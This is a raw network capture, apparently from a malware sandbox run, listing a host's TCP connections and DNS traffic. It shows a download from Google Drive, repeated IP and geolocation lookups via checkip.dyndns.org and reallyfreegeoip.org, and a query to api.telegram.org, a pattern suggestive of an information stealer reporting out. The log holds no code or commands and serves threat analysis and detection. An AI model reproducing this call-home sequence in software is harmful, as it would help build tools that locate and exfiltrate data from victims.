                                                                                              Oct 24, 2024 12:03:10.754695892 CEST49166443192.168.2.22188.114.97.3
                                                                                              Oct 24, 2024 12:03:10.754730940 CEST44349166188.114.97.3192.168.2.22
                                                                                              Oct 24, 2024 12:03:10.952076912 CEST8049164193.122.130.0192.168.2.22
                                                                                              Oct 24, 2024 12:03:10.952320099 CEST4916480192.168.2.22193.122.130.0
                                                                                              Oct 24, 2024 12:03:11.377726078 CEST44349166188.114.97.3192.168.2.22
                                                                                              Oct 24, 2024 12:03:11.380654097 CEST49166443192.168.2.22188.114.97.3
                                                                                              Oct 24, 2024 12:03:11.380714893 CEST44349166188.114.97.3192.168.2.22
                                                                                              Oct 24, 2024 12:03:11.519263029 CEST44349166188.114.97.3192.168.2.22
                                                                                              Oct 24, 2024 12:03:11.519428015 CEST44349166188.114.97.3192.168.2.22
                                                                                              Oct 24, 2024 12:03:11.519511938 CEST49166443192.168.2.22188.114.97.3
                                                                                              Oct 24, 2024 12:03:11.520636082 CEST49166443192.168.2.22188.114.97.3
                                                                                              Oct 24, 2024 12:03:11.540756941 CEST4916480192.168.2.22193.122.130.0
                                                                                              Oct 24, 2024 12:03:11.546338081 CEST8049164193.122.130.0192.168.2.22
                                                                                              Oct 24, 2024 12:03:11.546818972 CEST4916480192.168.2.22193.122.130.0
                                                                                              Oct 24, 2024 12:03:11.564021111 CEST4916780192.168.2.22132.226.8.169
                                                                                              Oct 24, 2024 12:03:11.569384098 CEST8049167132.226.8.169192.168.2.22
                                                                                              Oct 24, 2024 12:03:11.569480896 CEST4916780192.168.2.22132.226.8.169
                                                                                              Oct 24, 2024 12:03:11.569566011 CEST4916780192.168.2.22132.226.8.169
                                                                                              Oct 24, 2024 12:03:11.574933052 CEST8049167132.226.8.169192.168.2.22
                                                                                              Oct 24, 2024 12:03:12.638803959 CEST8049167132.226.8.169192.168.2.22
                                                                                              Oct 24, 2024 12:03:12.657659054 CEST49168443192.168.2.22188.114.96.3
                                                                                              Oct 24, 2024 12:03:12.657701969 CEST44349168188.114.96.3192.168.2.22
                                                                                              Oct 24, 2024 12:03:12.657763958 CEST49168443192.168.2.22188.114.96.3
                                                                                              Oct 24, 2024 12:03:12.658117056 CEST49168443192.168.2.22188.114.96.3
                                                                                              Oct 24, 2024 12:03:12.658130884 CEST44349168188.114.96.3192.168.2.22
                                                                                              Oct 24, 2024 12:03:12.849598885 CEST8049167132.226.8.169192.168.2.22
                                                                                              Oct 24, 2024 12:03:12.849739075 CEST4916780192.168.2.22132.226.8.169
                                                                                              Oct 24, 2024 12:03:13.278109074 CEST44349168188.114.96.3192.168.2.22
                                                                                              Oct 24, 2024 12:03:13.281162024 CEST49168443192.168.2.22188.114.96.3
                                                                                              Oct 24, 2024 12:03:13.281179905 CEST44349168188.114.96.3192.168.2.22
                                                                                              Oct 24, 2024 12:03:13.419342995 CEST44349168188.114.96.3192.168.2.22
                                                                                              Oct 24, 2024 12:03:13.419434071 CEST44349168188.114.96.3192.168.2.22
                                                                                              Oct 24, 2024 12:03:13.419476986 CEST49168443192.168.2.22188.114.96.3
                                                                                              Oct 24, 2024 12:03:13.420006037 CEST49168443192.168.2.22188.114.96.3
                                                                                              Oct 24, 2024 12:03:13.457293987 CEST4916980192.168.2.22132.226.247.73
                                                                                              Oct 24, 2024 12:03:13.462698936 CEST8049169132.226.247.73192.168.2.22
                                                                                              Oct 24, 2024 12:03:13.462862015 CEST4916980192.168.2.22132.226.247.73
                                                                                              Oct 24, 2024 12:03:13.462949991 CEST4916980192.168.2.22132.226.247.73
                                                                                              Oct 24, 2024 12:03:13.468172073 CEST8049169132.226.247.73192.168.2.22
                                                                                              Oct 24, 2024 12:03:14.334742069 CEST8049169132.226.247.73192.168.2.22
                                                                                              Oct 24, 2024 12:03:14.544008017 CEST8049169132.226.247.73192.168.2.22
                                                                                              Oct 24, 2024 12:03:14.546253920 CEST4916980192.168.2.22132.226.247.73
                                                                                              Oct 24, 2024 12:03:14.694822073 CEST49170443192.168.2.22188.114.96.3
                                                                                              Oct 24, 2024 12:03:14.694870949 CEST44349170188.114.96.3192.168.2.22
                                                                                              Oct 24, 2024 12:03:14.694943905 CEST49170443192.168.2.22188.114.96.3
                                                                                              Oct 24, 2024 12:03:14.695420027 CEST49170443192.168.2.22188.114.96.3
                                                                                              Oct 24, 2024 12:03:14.695432901 CEST44349170188.114.96.3192.168.2.22
                                                                                              Oct 24, 2024 12:03:15.293873072 CEST44349170188.114.96.3192.168.2.22
                                                                                              Oct 24, 2024 12:03:15.495331049 CEST44349170188.114.96.3192.168.2.22
                                                                                              Oct 24, 2024 12:03:15.495387077 CEST49170443192.168.2.22188.114.96.3
                                                                                              Oct 24, 2024 12:03:15.533149958 CEST49170443192.168.2.22188.114.96.3
                                                                                              Oct 24, 2024 12:03:15.533160925 CEST44349170188.114.96.3192.168.2.22
                                                                                              Oct 24, 2024 12:03:15.685297966 CEST44349170188.114.96.3192.168.2.22
                                                                                              Oct 24, 2024 12:03:15.685388088 CEST44349170188.114.96.3192.168.2.22
                                                                                              Oct 24, 2024 12:03:15.685436010 CEST49170443192.168.2.22188.114.96.3
                                                                                              Oct 24, 2024 12:03:15.696789980 CEST49170443192.168.2.22188.114.96.3
                                                                                              Oct 24, 2024 12:03:15.750264883 CEST4916980192.168.2.22132.226.247.73
                                                                                              Oct 24, 2024 12:03:15.756050110 CEST8049169132.226.247.73192.168.2.22
                                                                                              Oct 24, 2024 12:03:15.756506920 CEST4916980192.168.2.22132.226.247.73
                                                                                              Oct 24, 2024 12:03:15.800462008 CEST4917180192.168.2.22132.226.247.73
                                                                                              Oct 24, 2024 12:03:15.805830002 CEST8049171132.226.247.73192.168.2.22
                                                                                              Oct 24, 2024 12:03:15.805883884 CEST4917180192.168.2.22132.226.247.73
                                                                                              Oct 24, 2024 12:03:15.807598114 CEST4917180192.168.2.22132.226.247.73
                                                                                              Oct 24, 2024 12:03:15.813064098 CEST8049171132.226.247.73192.168.2.22
                                                                                              Oct 24, 2024 12:03:16.661395073 CEST8049171132.226.247.73192.168.2.22
                                                                                              Oct 24, 2024 12:03:16.675237894 CEST49172443192.168.2.22188.114.97.3
                                                                                              Oct 24, 2024 12:03:16.675272942 CEST44349172188.114.97.3192.168.2.22
                                                                                              Oct 24, 2024 12:03:16.675421000 CEST49172443192.168.2.22188.114.97.3
Timestamp                            | Source IP    | Dest IP | Trans ID | OP Code            | Name                         | Type           | Class       | DNS over HTTPS
Oct 24, 2024 12:03:01.934312105 CEST | 192.168.2.22 | 8.8.8.8 | 0xe1ee   | Standard query (0) | drive.google.com             | A (IP address) | IN (0x0001) | false
Oct 24, 2024 12:03:03.439872980 CEST | 192.168.2.22 | 8.8.8.8 | 0x33d5   | Standard query (0) | drive.usercontent.google.com | A (IP address) | IN (0x0001) | false
Oct 24, 2024 12:03:08.703336000 CEST | 192.168.2.22 | 8.8.8.8 | 0xd756   | Standard query (0) | checkip.dyndns.org           | A (IP address) | IN (0x0001) | false
Oct 24, 2024 12:03:08.715497971 CEST | 192.168.2.22 | 8.8.8.8 | 0x6d04   | Standard query (0) | checkip.dyndns.org           | A (IP address) | IN (0x0001) | false
Oct 24, 2024 12:03:09.588920116 CEST | 192.168.2.22 | 8.8.8.8 | 0xf2c    | Standard query (0) | reallyfreegeoip.org          | A (IP address) | IN (0x0001) | false
Oct 24, 2024 12:03:11.546086073 CEST | 192.168.2.22 | 8.8.8.8 | 0x410f   | Standard query (0) | checkip.dyndns.org           | A (IP address) | IN (0x0001) | false
Oct 24, 2024 12:03:11.556241989 CEST | 192.168.2.22 | 8.8.8.8 | 0x6df2   | Standard query (0) | checkip.dyndns.org           | A (IP address) | IN (0x0001) | false
Oct 24, 2024 12:03:12.645729065 CEST | 192.168.2.22 | 8.8.8.8 | 0xa09f   | Standard query (0) | reallyfreegeoip.org          | A (IP address) | IN (0x0001) | false
Oct 24, 2024 12:03:13.440778017 CEST | 192.168.2.22 | 8.8.8.8 | 0x971f   | Standard query (0) | checkip.dyndns.org           | A (IP address) | IN (0x0001) | false
Oct 24, 2024 12:03:13.449851036 CEST | 192.168.2.22 | 8.8.8.8 | 0x9f29   | Standard query (0) | checkip.dyndns.org           | A (IP address) | IN (0x0001) | false
Oct 24, 2024 12:03:14.682558060 CEST | 192.168.2.22 | 8.8.8.8 | 0x9e8f   | Standard query (0) | reallyfreegeoip.org          | A (IP address) | IN (0x0001) | false
Oct 24, 2024 12:03:15.780508041 CEST | 192.168.2.22 | 8.8.8.8 | 0xd6fd   | Standard query (0) | checkip.dyndns.org           | A (IP address) | IN (0x0001) | false
Oct 24, 2024 12:03:15.792776108 CEST | 192.168.2.22 | 8.8.8.8 | 0x8bc7   | Standard query (0) | checkip.dyndns.org           | A (IP address) | IN (0x0001) | false
Oct 24, 2024 12:03:16.667134047 CEST | 192.168.2.22 | 8.8.8.8 | 0x8a58   | Standard query (0) | reallyfreegeoip.org          | A (IP address) | IN (0x0001) | false
Oct 24, 2024 12:03:17.440143108 CEST | 192.168.2.22 | 8.8.8.8 | 0xbf15   | Standard query (0) | checkip.dyndns.org           | A (IP address) | IN (0x0001) | false
Oct 24, 2024 12:03:17.449368954 CEST | 192.168.2.22 | 8.8.8.8 | 0x1a99   | Standard query (0) | checkip.dyndns.org           | A (IP address) | IN (0x0001) | false
Oct 24, 2024 12:03:18.353665113 CEST | 192.168.2.22 | 8.8.8.8 | 0x14ff   | Standard query (0) | reallyfreegeoip.org          | A (IP address) | IN (0x0001) | false
Oct 24, 2024 12:03:19.244083881 CEST | 192.168.2.22 | 8.8.8.8 | 0xcc20   | Standard query (0) | checkip.dyndns.org           | A (IP address) | IN (0x0001) | false
Oct 24, 2024 12:03:19.253729105 CEST | 192.168.2.22 | 8.8.8.8 | 0xcb96   | Standard query (0) | checkip.dyndns.org           | A (IP address) | IN (0x0001) | false
Oct 24, 2024 12:03:19.926201105 CEST | 192.168.2.22 | 8.8.8.8 | 0x107e   | Standard query (0) | reallyfreegeoip.org          | A (IP address) | IN (0x0001) | false
Oct 24, 2024 12:03:20.711618900 CEST | 192.168.2.22 | 8.8.8.8 | 0x35cb   | Standard query (0) | checkip.dyndns.org           | A (IP address) | IN (0x0001) | false
Oct 24, 2024 12:03:21.035144091 CEST | 192.168.2.22 | 8.8.8.8 | 0xbf82   | Standard query (0) | checkip.dyndns.org           | A (IP address) | IN (0x0001) | false
Oct 24, 2024 12:03:21.099776030 CEST | 192.168.2.22 | 8.8.8.8 | 0xbf82   | Standard query (0) | checkip.dyndns.org           | A (IP address) | IN (0x0001) | false
Oct 24, 2024 12:03:21.987838984 CEST | 192.168.2.22 | 8.8.8.8 | 0x5ab7   | Standard query (0) | reallyfreegeoip.org          | A (IP address) | IN (0x0001) | false
Oct 24, 2024 12:03:22.774760962 CEST | 192.168.2.22 | 8.8.8.8 | 0x992f   | Standard query (0) | checkip.dyndns.org           | A (IP address) | IN (0x0001) | false
Oct 24, 2024 12:03:22.787944078 CEST | 192.168.2.22 | 8.8.8.8 | 0xa66a   | Standard query (0) | checkip.dyndns.org           | A (IP address) | IN (0x0001) | false
Oct 24, 2024 12:03:23.466106892 CEST | 192.168.2.22 | 8.8.8.8 | 0xfbf    | Standard query (0) | reallyfreegeoip.org          | A (IP address) | IN (0x0001) | false
Oct 24, 2024 12:03:24.286026001 CEST | 192.168.2.22 | 8.8.8.8 | 0xa178   | Standard query (0) | api.telegram.org             | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Oct 24, 2024 12:03:01.942065954 CEST | 8.8.8.8 | 192.168.2.22 | 0xe1ee | No error (0) | drive.google.com | - | 142.250.186.142 | A (IP address) | IN (0x0001) | false
Oct 24, 2024 12:03:03.456600904 CEST | 8.8.8.8 | 192.168.2.22 | 0x33d5 | No error (0) | drive.usercontent.google.com | - | 142.250.186.97 | A (IP address) | IN (0x0001) | false
Oct 24, 2024 12:03:08.711078882 CEST | 8.8.8.8 | 192.168.2.22 | 0xd756 | No error (0) | checkip.dyndns.org | checkip.dyndns.com | - | CNAME (Canonical name) | IN (0x0001) | false
Oct 24, 2024 12:03:08.711078882 CEST | 8.8.8.8 | 192.168.2.22 | 0xd756 | No error (0) | checkip.dyndns.com | - | 193.122.130.0 | A (IP address) | IN (0x0001) | false
Oct 24, 2024 12:03:08.711078882 CEST | 8.8.8.8 | 192.168.2.22 | 0xd756 | No error (0) | checkip.dyndns.com | - | 158.101.44.242 | A (IP address) | IN (0x0001) | false
Oct 24, 2024 12:03:08.711078882 CEST | 8.8.8.8 | 192.168.2.22 | 0xd756 | No error (0) | checkip.dyndns.com | - | 193.122.6.168 | A (IP address) | IN (0x0001) | false
Oct 24, 2024 12:03:08.711078882 CEST | 8.8.8.8 | 192.168.2.22 | 0xd756 | No error (0) | checkip.dyndns.com | - | 132.226.247.73 | A (IP address) | IN (0x0001) | false
Oct 24, 2024 12:03:08.711078882 CEST | 8.8.8.8 | 192.168.2.22 | 0xd756 | No error (0) | checkip.dyndns.com | - | 132.226.8.169 | A (IP address) | IN (0x0001) | false
Oct 24, 2024 12:03:08.723803043 CEST | 8.8.8.8 | 192.168.2.22 | 0x6d04 | No error (0) | checkip.dyndns.org | checkip.dyndns.com | - | CNAME (Canonical name) | IN (0x0001) | false
Oct 24, 2024 12:03:08.723803043 CEST | 8.8.8.8 | 192.168.2.22 | 0x6d04 | No error (0) | checkip.dyndns.com | - | 132.226.247.73 | A (IP address) | IN (0x0001) | false
Oct 24, 2024 12:03:08.723803043 CEST | 8.8.8.8 | 192.168.2.22 | 0x6d04 | No error (0) | checkip.dyndns.com | - | 132.226.8.169 | A (IP address) | IN (0x0001) | false
Oct 24, 2024 12:03:08.723803043 CEST | 8.8.8.8 | 192.168.2.22 | 0x6d04 | No error (0) | checkip.dyndns.com | - | 158.101.44.242 | A (IP address) | IN (0x0001) | false
Oct 24, 2024 12:03:08.723803043 CEST | 8.8.8.8 | 192.168.2.22 | 0x6d04 | No error (0) | checkip.dyndns.com | - | 193.122.6.168 | A (IP address) | IN (0x0001) | false
Oct 24, 2024 12:03:08.723803043 CEST | 8.8.8.8 | 192.168.2.22 | 0x6d04 | No error (0) | checkip.dyndns.com | - | 193.122.130.0 | A (IP address) | IN (0x0001) | false
Oct 24, 2024 12:03:09.600358009 CEST | 8.8.8.8 | 192.168.2.22 | 0xf2c | No error (0) | reallyfreegeoip.org | - | 188.114.97.3 | A (IP address) | IN (0x0001) | false
Oct 24, 2024 12:03:09.600358009 CEST | 8.8.8.8 | 192.168.2.22 | 0xf2c | No error (0) | reallyfreegeoip.org | - | 188.114.96.3 | A (IP address) | IN (0x0001) | false
Oct 24, 2024 12:03:11.553348064 CEST | 8.8.8.8 | 192.168.2.22 | 0x410f | No error (0) | checkip.dyndns.org | checkip.dyndns.com | - | CNAME (Canonical name) | IN (0x0001) | false
Oct 24, 2024 12:03:11.553348064 CEST | 8.8.8.8 | 192.168.2.22 | 0x410f | No error (0) | checkip.dyndns.com | - | 132.226.8.169 | A (IP address) | IN (0x0001) | false
Oct 24, 2024 12:03:11.553348064 CEST | 8.8.8.8 | 192.168.2.22 | 0x410f | No error (0) | checkip.dyndns.com | - | 193.122.6.168 | A (IP address) | IN (0x0001) | false
Oct 24, 2024 12:03:11.553348064 CEST | 8.8.8.8 | 192.168.2.22 | 0x410f | No error (0) | checkip.dyndns.com | - | 158.101.44.242 | A (IP address) | IN (0x0001) | false
Oct 24, 2024 12:03:11.553348064 CEST | 8.8.8.8 | 192.168.2.22 | 0x410f | No error (0) | checkip.dyndns.com | - | 193.122.130.0 | A (IP address) | IN (0x0001) | false
Oct 24, 2024 12:03:11.553348064 CEST | 8.8.8.8 | 192.168.2.22 | 0x410f | No error (0) | checkip.dyndns.com | - | 132.226.247.73 | A (IP address) | IN (0x0001) | false
Oct 24, 2024 12:03:11.563252926 CEST | 8.8.8.8 | 192.168.2.22 | 0x6df2 | No error (0) | checkip.dyndns.org | checkip.dyndns.com | - | CNAME (Canonical name) | IN (0x0001) | false
Oct 24, 2024 12:03:11.563252926 CEST | 8.8.8.8 | 192.168.2.22 | 0x6df2 | No error (0) | checkip.dyndns.com | - | 132.226.247.73 | A (IP address) | IN (0x0001) | false
Oct 24, 2024 12:03:11.563252926 CEST | 8.8.8.8 | 192.168.2.22 | 0x6df2 | No error (0) | checkip.dyndns.com | - | 193.122.130.0 | A (IP address) | IN (0x0001) | false
Oct 24, 2024 12:03:11.563252926 CEST | 8.8.8.8 | 192.168.2.22 | 0x6df2 | No error (0) | checkip.dyndns.com | - | 132.226.8.169 | A (IP address) | IN (0x0001) | false
Oct 24, 2024 12:03:11.563252926 CEST | 8.8.8.8 | 192.168.2.22 | 0x6df2 | No error (0) | checkip.dyndns.com | - | 158.101.44.242 | A (IP address) | IN (0x0001) | false
Oct 24, 2024 12:03:11.563252926 CEST | 8.8.8.8 | 192.168.2.22 | 0x6df2 | No error (0) | checkip.dyndns.com | - | 193.122.6.168 | A (IP address) | IN (0x0001) | false
Oct 24, 2024 12:03:12.657155991 CEST | 8.8.8.8 | 192.168.2.22 | 0xa09f | No error (0) | reallyfreegeoip.org | - | 188.114.96.3 | A (IP address) | IN (0x0001) | false
Oct 24, 2024 12:03:12.657155991 CEST | 8.8.8.8 | 192.168.2.22 | 0xa09f | No error (0) | reallyfreegeoip.org | - | 188.114.97.3 | A (IP address) | IN (0x0001) | false
Oct 24, 2024 12:03:13.447781086 CEST | 8.8.8.8 | 192.168.2.22 | 0x971f | No error (0) | checkip.dyndns.org | checkip.dyndns.com | - | CNAME (Canonical name) | IN (0x0001) | false
Oct 24, 2024 12:03:13.447781086 CEST | 8.8.8.8 | 192.168.2.22 | 0x971f | No error (0) | checkip.dyndns.com | - | 132.226.247.73 | A (IP address) | IN (0x0001) | false
Oct 24, 2024 12:03:13.447781086 CEST | 8.8.8.8 | 192.168.2.22 | 0x971f | No error (0) | checkip.dyndns.com | - | 193.122.130.0 | A (IP address) | IN (0x0001) | false
Oct 24, 2024 12:03:13.447781086 CEST | 8.8.8.8 | 192.168.2.22 | 0x971f | No error (0) | checkip.dyndns.com | - | 193.122.6.168 | A (IP address) | IN (0x0001) | false
Oct 24, 2024 12:03:13.447781086 CEST | 8.8.8.8 | 192.168.2.22 | 0x971f | No error (0) | checkip.dyndns.com | - | 132.226.8.169 | A (IP address) | IN (0x0001) | false
Oct 24, 2024 12:03:13.447781086 CEST | 8.8.8.8 | 192.168.2.22 | 0x971f | No error (0) | checkip.dyndns.com | - | 158.101.44.242 | A (IP address) | IN (0x0001) | false
Oct 24, 2024 12:03:13.456893921 CEST | 8.8.8.8 | 192.168.2.22 | 0x9f29 | No error (0) | checkip.dyndns.org | checkip.dyndns.com | - | CNAME (Canonical name) | IN (0x0001) | false
Oct 24, 2024 12:03:13.456893921 CEST | 8.8.8.8 | 192.168.2.22 | 0x9f29 | No error (0) | checkip.dyndns.com | - | 158.101.44.242 | A (IP address) | IN (0x0001) | false
Oct 24, 2024 12:03:13.456893921 CEST | 8.8.8.8 | 192.168.2.22 | 0x9f29 | No error (0) | checkip.dyndns.com | - | 132.226.247.73 | A (IP address) | IN (0x0001) | false
Oct 24, 2024 12:03:13.456893921 CEST | 8.8.8.8 | 192.168.2.22 | 0x9f29 | No error (0) | checkip.dyndns.com | - | 132.226.8.169 | A (IP address) | IN (0x0001) | false
Oct 24, 2024 12:03:13.456893921 CEST | 8.8.8.8 | 192.168.2.22 | 0x9f29 | No error (0) | checkip.dyndns.com | - | 193.122.6.168 | A (IP address) | IN (0x0001) | false
Oct 24, 2024 12:03:13.456893921 CEST | 8.8.8.8 | 192.168.2.22 | 0x9f29 | No error (0) | checkip.dyndns.com | - | 193.122.130.0 | A (IP address) | IN (0x0001) | false
Oct 24, 2024 12:03:14.693219900 CEST | 8.8.8.8 | 192.168.2.22 | 0x9e8f | No error (0) | reallyfreegeoip.org | - | 188.114.96.3 | A (IP address) | IN (0x0001) | false
Oct 24, 2024 12:03:14.693219900 CEST | 8.8.8.8 | 192.168.2.22 | 0x9e8f | No error (0) | reallyfreegeoip.org | - | 188.114.97.3 | A (IP address) | IN (0x0001) | false
Oct 24, 2024 12:03:15.787566900 CEST | 8.8.8.8 | 192.168.2.22 | 0xd6fd | No error (0) | checkip.dyndns.org | checkip.dyndns.com | - | CNAME (Canonical name) | IN (0x0001) | false
Oct 24, 2024 12:03:15.787566900 CEST | 8.8.8.8 | 192.168.2.22 | 0xd6fd | No error (0) | checkip.dyndns.com | - | 132.226.247.73 | A (IP address) | IN (0x0001) | false
Oct 24, 2024 12:03:15.787566900 CEST | 8.8.8.8 | 192.168.2.22 | 0xd6fd | No error (0) | checkip.dyndns.com | - | 158.101.44.242 | A (IP address) | IN (0x0001) | false
Oct 24, 2024 12:03:15.787566900 CEST | 8.8.8.8 | 192.168.2.22 | 0xd6fd | No error (0) | checkip.dyndns.com | - | 193.122.130.0 | A (IP address) | IN (0x0001) | false
Oct 24, 2024 12:03:15.787566900 CEST | 8.8.8.8 | 192.168.2.22 | 0xd6fd | No error (0) | checkip.dyndns.com | - | 193.122.6.168 | A (IP address) | IN (0x0001) | false
Oct 24, 2024 12:03:15.787566900 CEST | 8.8.8.8 | 192.168.2.22 | 0xd6fd | No error (0) | checkip.dyndns.com | - | 132.226.8.169 | A (IP address) | IN (0x0001) | false
Oct 24, 2024 12:03:15.799765110 CEST | 8.8.8.8 | 192.168.2.22 | 0x8bc7 | No error (0) | checkip.dyndns.org | checkip.dyndns.com | - | CNAME (Canonical name) | IN (0x0001) | false
Oct 24, 2024 12:03:15.799765110 CEST | 8.8.8.8 | 192.168.2.22 | 0x8bc7 | No error (0) | checkip.dyndns.com | - | 193.122.130.0 | A (IP address) | IN (0x0001) | false
Oct 24, 2024 12:03:15.799765110 CEST | 8.8.8.8 | 192.168.2.22 | 0x8bc7 | No error (0) | checkip.dyndns.com | - | 132.226.8.169 | A (IP address) | IN (0x0001) | false
Oct 24, 2024 12:03:15.799765110 CEST | 8.8.8.8 | 192.168.2.22 | 0x8bc7 | No error (0) | checkip.dyndns.com | - | 158.101.44.242 | A (IP address) | IN (0x0001) | false
Oct 24, 2024 12:03:15.799765110 CEST | 8.8.8.8 | 192.168.2.22 | 0x8bc7 | No error (0) | checkip.dyndns.com | - | 193.122.6.168 | A (IP address) | IN (0x0001) | false
Oct 24, 2024 12:03:15.799765110 CEST | 8.8.8.8 | 192.168.2.22 | 0x8bc7 | No error (0) | checkip.dyndns.com | - | 132.226.247.73 | A (IP address) | IN (0x0001) | false
Oct 24, 2024 12:03:16.674820900 CEST | 8.8.8.8 | 192.168.2.22 | 0x8a58 | No error (0) | reallyfreegeoip.org | - | 188.114.97.3 | A (IP address) | IN (0x0001) | false
Oct 24, 2024 12:03:16.674820900 CEST | 8.8.8.8 | 192.168.2.22 | 0x8a58 | No error (0) | reallyfreegeoip.org | - | 188.114.96.3 | A (IP address) | IN (0x0001) | false
Oct 24, 2024 12:03:17.447386980 CEST | 8.8.8.8 | 192.168.2.22 | 0xbf15 | No error (0) | checkip.dyndns.org | checkip.dyndns.com | - | CNAME (Canonical name) | IN (0x0001) | false
Oct 24, 2024 12:03:17.447386980 CEST | 8.8.8.8 | 192.168.2.22 | 0xbf15 | No error (0) | checkip.dyndns.com | - | 132.226.247.73 | A (IP address) | IN (0x0001) | false
Oct 24, 2024 12:03:17.447386980 CEST | 8.8.8.8 | 192.168.2.22 | 0xbf15 | No error (0) | checkip.dyndns.com | - | 132.226.8.169 | A (IP address) | IN (0x0001) | false
Oct 24, 2024 12:03:17.447386980 CEST | 8.8.8.8 | 192.168.2.22 | 0xbf15 | No error (0) | checkip.dyndns.com | - | 158.101.44.242 | A (IP address) | IN (0x0001) | false
Oct 24, 2024 12:03:17.447386980 CEST | 8.8.8.8 | 192.168.2.22 | 0xbf15 | No error (0) | checkip.dyndns.com | - | 193.122.130.0 | A (IP address) | IN (0x0001) | false
Oct 24, 2024 12:03:17.447386980 CEST | 8.8.8.8 | 192.168.2.22 | 0xbf15 | No error (0) | checkip.dyndns.com | - | 193.122.6.168 | A (IP address) | IN (0x0001) | false
Oct 24, 2024 12:03:17.456434965 CEST | 8.8.8.8 | 192.168.2.22 | 0x1a99 | No error (0) | checkip.dyndns.org | checkip.dyndns.com | - | CNAME (Canonical name) | IN (0x0001) | false
Oct 24, 2024 12:03:17.456434965 CEST | 8.8.8.8 | 192.168.2.22 | 0x1a99 | No error (0) | checkip.dyndns.com | - | 193.122.130.0 | A (IP address) | IN (0x0001) | false
Oct 24, 2024 12:03:17.456434965 CEST | 8.8.8.8 | 192.168.2.22 | 0x1a99 | No error (0) | checkip.dyndns.com | - | 132.226.8.169 | A (IP address) | IN (0x0001) | false
Oct 24, 2024 12:03:17.456434965 CEST | 8.8.8.8 | 192.168.2.22 | 0x1a99 | No error (0) | checkip.dyndns.com | - | 132.226.247.73 | A (IP address) | IN (0x0001) | false
Oct 24, 2024 12:03:17.456434965 CEST | 8.8.8.8 | 192.168.2.22 | 0x1a99 | No error (0) | checkip.dyndns.com | - | 158.101.44.242 | A (IP address) | IN (0x0001) | false
Oct 24, 2024 12:03:17.456434965 CEST | 8.8.8.8 | 192.168.2.22 | 0x1a99 | No error (0) | checkip.dyndns.com | - | 193.122.6.168 | A (IP address) | IN (0x0001) | false
Oct 24, 2024 12:03:18.361125946 CEST | 8.8.8.8 | 192.168.2.22 | 0x14ff | No error (0) | reallyfreegeoip.org | - | 188.114.97.3 | A (IP address) | IN (0x0001) | false
Oct 24, 2024 12:03:18.361125946 CEST | 8.8.8.8 | 192.168.2.22 | 0x14ff | No error (0) | reallyfreegeoip.org | - | 188.114.96.3 | A (IP address) | IN (0x0001) | false
Oct 24, 2024 12:03:19.251288891 CEST | 8.8.8.8 | 192.168.2.22 | 0xcc20 | No error (0) | checkip.dyndns.org | checkip.dyndns.com | - | CNAME (Canonical name) | IN (0x0001) | false
Oct 24, 2024 12:03:19.251288891 CEST | 8.8.8.8 | 192.168.2.22 | 0xcc20 | No error (0) | checkip.dyndns.com | - | 193.122.130.0 | A (IP address) | IN (0x0001) | false
Oct 24, 2024 12:03:19.251288891 CEST | 8.8.8.8 | 192.168.2.22 | 0xcc20 | No error (0) | checkip.dyndns.com | - | 158.101.44.242 | A (IP address) | IN (0x0001) | false
Oct 24, 2024 12:03:19.251288891 CEST | 8.8.8.8 | 192.168.2.22 | 0xcc20 | No error (0) | checkip.dyndns.com | - | 132.226.247.73 | A (IP address) | IN (0x0001) | false
Oct 24, 2024 12:03:19.251288891 CEST | 8.8.8.8 | 192.168.2.22 | 0xcc20 | No error (0) | checkip.dyndns.com | - | 132.226.8.169 | A (IP address) | IN (0x0001) | false
Oct 24, 2024 12:03:19.251288891 CEST | 8.8.8.8 | 192.168.2.22 | 0xcc20 | No error (0) | checkip.dyndns.com | - | 193.122.6.168 | A (IP address) | IN (0x0001) | false
Oct 24, 2024 12:03:19.260782957 CEST | 8.8.8.8 | 192.168.2.22 | 0xcb96 | No error (0) | checkip.dyndns.org | checkip.dyndns.com | - | CNAME (Canonical name) | IN (0x0001) | false
Oct 24, 2024 12:03:19.260782957 CEST | 8.8.8.8 | 192.168.2.22 | 0xcb96 | No error (0) | checkip.dyndns.com | - | 193.122.6.168 | A (IP address) | IN (0x0001) | false
Oct 24, 2024 12:03:19.260782957 CEST | 8.8.8.8 | 192.168.2.22 | 0xcb96 | No error (0) | checkip.dyndns.com | - | 158.101.44.242 | A (IP address) | IN (0x0001) | false
Oct 24, 2024 12:03:19.260782957 CEST | 8.8.8.8 | 192.168.2.22 | 0xcb96 | No error (0) | checkip.dyndns.com | - | 132.226.8.169 | A (IP address) | IN (0x0001) | false
Oct 24, 2024 12:03:19.260782957 CEST | 8.8.8.8 | 192.168.2.22 | 0xcb96 | No error (0) | checkip.dyndns.com | - | 132.226.247.73 | A (IP address) | IN (0x0001) | false
Oct 24, 2024 12:03:19.260782957 CEST | 8.8.8.8 | 192.168.2.22 | 0xcb96 | No error (0) | checkip.dyndns.com | - | 193.122.130.0 | A (IP address) | IN (0x0001) | false
Oct 24, 2024 12:03:19.934623003 CEST | 8.8.8.8 | 192.168.2.22 | 0x107e | No error (0) | reallyfreegeoip.org | - | 188.114.97.3 | A (IP address) | IN (0x0001) | false
Oct 24, 2024 12:03:19.934623003 CEST | 8.8.8.8 | 192.168.2.22 | 0x107e | No error (0) | reallyfreegeoip.org | - | 188.114.96.3 | A (IP address) | IN (0x0001) | false
Oct 24, 2024 12:03:20.718589067 CEST | 8.8.8.8 | 192.168.2.22 | 0x35cb | No error (0) | checkip.dyndns.org | checkip.dyndns.com | - | CNAME (Canonical name) | IN (0x0001) | false
Oct 24, 2024 12:03:20.718589067 CEST | 8.8.8.8 | 192.168.2.22 | 0x35cb | No error (0) | checkip.dyndns.com | - | 132.226.247.73 | A (IP address) | IN (0x0001) | false
Oct 24, 2024 12:03:20.718589067 CEST | 8.8.8.8 | 192.168.2.22 | 0x35cb | No error (0) | checkip.dyndns.com | - | 158.101.44.242 | A (IP address) | IN (0x0001) | false
Oct 24, 2024 12:03:20.718589067 CEST | 8.8.8.8 | 192.168.2.22 | 0x35cb | No error (0) | checkip.dyndns.com | - | 193.122.6.168 | A (IP address) | IN (0x0001) | false
Oct 24, 2024 12:03:20.718589067 CEST | 8.8.8.8 | 192.168.2.22 | 0x35cb | No error (0) | checkip.dyndns.com | - | 132.226.8.169 | A (IP address) | IN (0x0001) | false
Oct 24, 2024 12:03:20.718589067 CEST | 8.8.8.8 | 192.168.2.22 | 0x35cb | No error (0) | checkip.dyndns.com | - | 193.122.130.0 | A (IP address) | IN (0x0001) | false
